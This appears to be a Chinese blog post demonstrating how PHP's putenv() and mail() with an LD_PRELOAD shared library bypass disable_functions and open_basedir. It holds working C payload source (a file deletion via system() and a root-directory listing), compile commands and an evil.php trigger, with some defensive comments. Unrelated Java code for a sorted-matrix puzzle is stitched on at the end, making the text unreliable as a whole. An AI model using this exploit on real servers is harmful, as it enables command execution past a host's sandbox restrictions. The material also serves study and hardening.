Tianji's Blog.

LD_PRELOAD绕过open_basedir

2018/06/04

LD_PRELOAD绕过open_basedir

参考链接:

利用环境变量LD_PRELOAD绕过disable_function执行系统命令

PHP绕过open_basedir列目录的研究

源码:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Demonstration action executed from inside the preloaded shared object:
 * it calls system() to delete /tmp/check.txt, the marker file the article
 * uses to show that a command ran.
 *
 * The command runs in whichever process loaded this library, so PHP-level
 * restrictions (disable_functions, open_basedir) are never consulted for it.
 * NOTE(review): the return value of system() is ignored.
 */
void payload() {
system("rm /tmp/check.txt");
}
/*
 * Definition of geteuid() that takes the place of the libc one when this
 * object is named in LD_PRELOAD.
 *
 * - If LD_PRELOAD is not set in the environment, it returns 0 and does
 *   nothing else.
 * - Otherwise it removes LD_PRELOAD from the environment and then calls
 *   payload(). Presumably the unsetenv() is there so that the shell started
 *   by system() does not load this library again and re-enter this path.
 *
 * NOTE(review): the branch that calls payload() reaches the end of a
 * non-void function without a return statement, so the value seen by the
 * caller is undefined.
 *
 * Defender's view: a child process of the web server / PHP worker whose
 * environment carries LD_PRELOAD pointing at a file under the web root is a
 * strong indicator of this technique and is worth alerting on.
 */
int geteuid() {
/* No LD_PRELOAD in the environment: skip the payload and return 0. */
if (getenv("LD_PRELOAD") == NULL) { return 0; }
/* Clear the variable before spawning anything from payload(). */
unsetenv("LD_PRELOAD");
payload();
}

编译:

# Compile shell.c into a position-independent object file (written to "teset").
gcc -c -fPIC shell.c -o teset
# Link that object file into the shared library test.so, the file that
# evil.php later names in LD_PRELOAD.
gcc -shared teset -o test.so

evil.php

<?php
// Put LD_PRELOAD into this PHP process's environment so that any child
// process it starts inherits it. The library path sits under /var/www/html,
// i.e. inside the web root (presumably a location the PHP user can write to).
putenv("LD_PRELOAD=/var/www/html/preload/test.so");
// mail() is used only as a way to make PHP start an external program: where a
// sendmail binary is configured, PHP launches it as a child process, and that
// child is what loads test.so. The recipient and the empty arguments are
// irrelevant to the effect.
// Hardening note: open_basedir and disable_functions only constrain PHP
// itself, not code loaded into child processes. List putenv together with
// process-spawning functions such as mail in disable_functions, and keep
// web-writable directories from holding loadable libraries.
mail("a@localhost","","","","");
?>

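执行 evil.php 后,可以发现 /tmp/check.txt 被删除。原因是:mail() 会启动外部的 sendmail 进程(需要环境中配置了 sendmail),该子进程继承了 LD_PRELOAD 并加载 test.so,在调用 geteuid() 时执行 payload();这段代码运行在 PHP 解释器之外,因此不受 disable_functions 和 open_basedir 的限制。防御上应在 disable_functions 中同时禁用 putenv 以及 mail 等会派生子进程的函数。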

列目录的payload:

#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
 * Directory-listing variant of the demonstration payload: opens "/" with
 * opendir(), and writes the name of every entry returned by readdir(), one
 * per line, to /tmp/venenoveneno.
 *
 * Like the first payload, this runs inside the process that loaded the
 * library, so PHP's open_basedir check is not applied to the opendir() call.
 *
 * NOTE(review): neither opendir() nor fopen() is checked for NULL, so a
 * failure of either leads to a NULL pointer being passed to readdir() or
 * fprintf(). The stream is flushed but never closed with fclose().
 *
 * Defender's view: unexpected files created under /tmp by a mail-delivery
 * child process of the web server are a useful artefact to look for.
 */
void payload()
{
DIR* dir;
struct dirent* ptr;
/* Directory whose entries are enumerated. */
dir = opendir("/");
FILE *fp;
/* Output file that receives the listing; truncated on open ("w"). */
fp=fopen("/tmp/venenoveneno","w");
while ((ptr = readdir(dir)) != NULL) {
fprintf(fp,"%s\n",ptr->d_name);
}
closedir(dir);
/* Push buffered output to the file; the FILE itself stays open. */
fflush(fp);
}
/*
 * Definition of geteuid() that takes the place of the libc one when this
 * object is named in LD_PRELOAD; same logic as in the first listing.
 *
 * Returns 0 without side effects when LD_PRELOAD is not set. Otherwise it
 * removes LD_PRELOAD from the environment and calls payload().
 *
 * NOTE(review): the branch that calls payload() ends without a return
 * statement, so the value seen by the caller is undefined.
 */
int geteuid()
{
/* No LD_PRELOAD in the environment: skip the payload and return 0. */
if (getenv("LD_PRELOAD") == NULL) {
return 0;
}
/* Clear the variable so later child processes do not inherit it. */
unsetenv("LD_PRELOAD");
payload();
}
Given a two-dimensional boolean array in which every row is sorted:

0 0 0 1 1 1 1
0 0 1 1 1 1 1
0 0 0 0 0 1 1
0 0 0 0 1 1 1

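Find the row(s) with the most 1s using an O(M+N) solution; for the matrix above the expected answer is [(1,5)] (row index 1, which contains five 1s).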

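/**
 * Finds the row or rows containing the most 1s in a 0/1 matrix whose rows are each sorted in
 * ascending order (all 0s before all 1s).
 *
 * <p>Each row is binary-searched for its first 1, so the running time is O(m log n) rather
 * than the O(m + n) mentioned in the problem statement.
 *
 * @param sortedArray the matrix; the first {@code m} rows are read, {@code n} cells each
 * @param m number of rows to examine
 * @param n number of columns in every row
 * @return a two-element list: element 0 is an {@code ArrayList<Integer>} of the row indices
 *     that hold the most 1s, element 1 is that count as an {@code Integer}; {@code null} when
 *     {@code m} or {@code n} is negative or when no examined row contains a 1
 */
public static ArrayList<Object> getSoulution(int[][] sortedArray, int m, int n) {
    if (m < 0 || n < 0) {
        return null;
    }

    // Position of the first 1 in every row; n means "this row has no 1".
    int[] firstOne = new int[m];
    int min = n;
    for (int i = 0; i < m; i++) {
        firstOne[i] = getFirstIndex(sortedArray[i], n);
        min = Math.min(min, firstOne[i]);
    }

    // No row contains a 1 (this also covers m == 0 and n == 0).
    if (min == n) {
        return null;
    }

    // The earlier the first 1, the more 1s the row holds; collect every row tied for it.
    ArrayList<Integer> minIndexs = new ArrayList<>();
    for (int i = 0; i < m; i++) {
        if (firstOne[i] == min) {
            minIndexs.add(i);
        }
    }

    ArrayList<Object> solution = new ArrayList<>();
    solution.add(minIndexs);
    solution.add(n - min);
    return solution;
}

/**
 * Returns the index of the first 1 in a sorted 0/1 row.
 *
 * @param array the row, sorted so that every 0 precedes every 1
 * @param n number of cells of {@code array} to consider
 * @return the index of the first 1, or {@code n} when the row is empty or contains no 1
 */
private static int getFirstIndex(int[] array, int n) {
    // An empty row, or a row whose last cell is 0, contains no 1 at all.
    if (n == 0 || array[n - 1] == 0) {
        return n;
    }

    // Invariant: array[end] == 1, and every cell before start is 0.
    int start = 0;
    int end = n - 1;
    while (start < end) {
        // Overflow-safe midpoint.
        int middle = start + (end - start) / 2;
        if (array[middle] == 0) {
            start = middle + 1;
        } else {
            // middle may itself be the first 1, so keep it inside the range.
            end = middle;
        }
    }
    return start;
}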